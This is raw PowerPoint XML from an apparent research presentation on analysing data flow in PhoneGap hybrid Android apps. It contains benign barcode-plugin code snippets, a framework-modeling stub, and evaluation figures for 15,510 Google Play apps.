                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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           onDeviceReady, false);</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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            function onDeviceReady()     {   </a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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              window.plugins.barcodeScanner.scan(0,onSuccess, </a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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              onError);</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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            }</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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        ……</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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     &lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 &lt;/body&gt; </a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="410" name="Group 410"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7398427" y="1137343"/>
            <a:ext cx="379180" cy="305152"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="379178" cy="305150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408" name="Shape 408"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="379179" cy="30515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9" name="Shape 409"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="10346"/>
              <a:ext cx="379179" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FF0000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FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>C3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="413" name="Group 413"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7891896" y="1963643"/>
            <a:ext cx="379180" cy="305152"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="379178" cy="305150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="411" name="Shape 411"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="379179" cy="30515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2" name="Shape 412"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="10346"/>
              <a:ext cx="379179" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FF0000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FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>C2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="416" name="Group 416"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7022579" y="2555433"/>
            <a:ext cx="379180" cy="305152"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="379178" cy="305150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="Shape 414"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="379179" cy="30515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>
              <a:off x="-1" y="10346"/>
              <a:ext cx="379179" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FF0000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FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>C1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xfrm>
            <a:off x="457200" y="20637"/>
            <a:ext cx="8229600" cy="56807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859536">
              <a:defRPr sz="35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04617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hybrid Apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163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8800" y="565273"/>
            <a:ext cx="7812528" cy="45088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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584965" y="482168"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Framework Modeling </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Shape 419"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1482771"/>
            <a:ext cx="8229601" cy="3292085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="449914" indent="-456264">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="2000"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Goal: connect data flow within PhoneGap Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="422" name="Group 422"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1072783" y="3388123"/>
            <a:ext cx="1502955" cy="433278"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="1502953" cy="433276"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="420" name="Shape 420"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="0"/>
              <a:ext cx="1502955" cy="43327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498B"/>
                </a:gs>
                <a:gs pos="68000">
                  <a:srgbClr val="68AAE5"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2D8FB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125092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pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="421" name="Shape 421"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21148" y="74409"/>
              <a:ext cx="1460656" cy="2844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75" tIns="34275" rIns="34275" bIns="34275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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweathe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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PhoneGap </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="425" name="Group 425"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3354515" y="3513761"/>
            <a:ext cx="1759666" cy="1023751"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="1759665" cy="1023750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="423" name="Shape 423"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="0"/>
              <a:ext cx="1759666" cy="1023751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86DAFC"/>
                </a:gs>
                <a:gs pos="43000">
                  <a:srgbClr val="BBEBFF"/>
                </a:gs>
                <a:gs pos="93000">
                  <a:srgbClr val="EBF9FF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="F9FDFE"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="37721" t="-19636" r="62278" b="119636"/>
              </a:path>
            </a:gradFill>
            <a:ln w="9525" cap="flat">
              <a:solidFill>
                <a:srgbClr val="1F73A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49974" y="369645"/>
              <a:ext cx="1659714" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"/>
                <a:t>Framework Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Shape 426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2589463" y="3615178"/>
            <a:ext cx="780814" cy="301"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0F6FC6"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="stealth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27" name="Shape 427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669450" y="3288276"/>
            <a:ext cx="807814" cy="208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>
              <a:defRPr sz="900"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="900"/>
              <a:t>Data Flow </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1923600" y="4370906"/>
            <a:ext cx="1411208" cy="2807"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0F6FC6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29" name="Shape 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1902804" y="3810925"/>
            <a:ext cx="2306" cy="553539"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0F6FC6"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="stealth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30" name="Shape 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2368169" y="4438141"/>
            <a:ext cx="905637" cy="208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>
              <a:defRPr sz="900"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="900"/>
              <a:t>Data Flow </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="433" name="Group 433"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5482334" y="2080510"/>
            <a:ext cx="3464217" cy="2508952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3464216" cy="2508950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="431" name="Shape 431"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-2"/>
              <a:ext cx="3464216" cy="2376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130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F6FC6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2" name="Shape 432"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="65499"/>
              <a:ext cx="3266180" cy="24434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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>window = { plugins: { barcodeScanner:{</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>    scan: function scan (mode,suc,err) {</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>      exec(suc, err, “scan”,[mode]);</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>}}}}</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>exec:function exec(suc,err,plugin,op,arg){</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>     var dat = “fake”;</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>      suc(dat);</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>      err(dat);</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="436" name="Group 436"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="286684" y="2293188"/>
            <a:ext cx="2755930" cy="693515"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="2755928" cy="693514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="434" name="Shape 434"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="-2"/>
              <a:ext cx="2755930" cy="69351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rgbClr val="009DD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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pP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33850" y="96578"/>
              <a:ext cx="2688222" cy="5003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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr>
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"/>
                <a:t>Windows.plugins.barcodeScanner.scan(0, onSuccess, onError);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664647" y="2986695"/>
            <a:ext cx="42905" cy="393905"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0F6FC6"/>
            </a:solidFill>
            <a:prstDash val="dot"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38" name="Shape 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5122335" y="3268722"/>
            <a:ext cx="360003" cy="507001"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0F6FC6"/>
            </a:solidFill>
            <a:prstDash val="dot"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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evaluation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 441"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1451373"/>
            <a:ext cx="8229601" cy="1066979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263071" lvl="0" indent="-269421">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="105555"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>15,510</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t> apps from the official Google Play Market</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="449914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Hardware spec: Intel Core </a:t>
            </a:r>
            <a:r>
              <a:t>i7-2600 3.4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>GHz with </a:t>
            </a:r>
            <a:r>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>GB RAM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Shape 442"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509664" y="3100222"/>
            <a:ext cx="4062335" cy="728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/>
          <a:p>
            <a:pPr marL="449914" lvl="0" indent="-456264">
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="95000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Average processing time :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>15.38</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t> sec/app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624465" y="3100222"/>
            <a:ext cx="4259037" cy="1099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/>
          <a:p>
            <a:pPr marL="263071" lvl="0" indent="-269421">
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="105555"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>478/15,510 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>flagged as vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="449914" lvl="0" indent="-456264">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="95000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>False positive rate: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>2.30% </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>   (because of dead code)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="446" name="Group 446"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838489" y="2596479"/>
            <a:ext cx="2776935" cy="417958"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="2776933" cy="417956"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Shape 444"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-2"/>
              <a:ext cx="2776935" cy="417958"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92F6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5" name="Shape 445"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20400" y="15948"/>
              <a:ext cx="2736134" cy="3860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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr sz="2100">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2100"/>
                <a:t>Performance</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="449" name="Group 449"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4848357" y="2594915"/>
            <a:ext cx="2776938" cy="417958"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2776936" cy="417956"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="Shape 447"/>
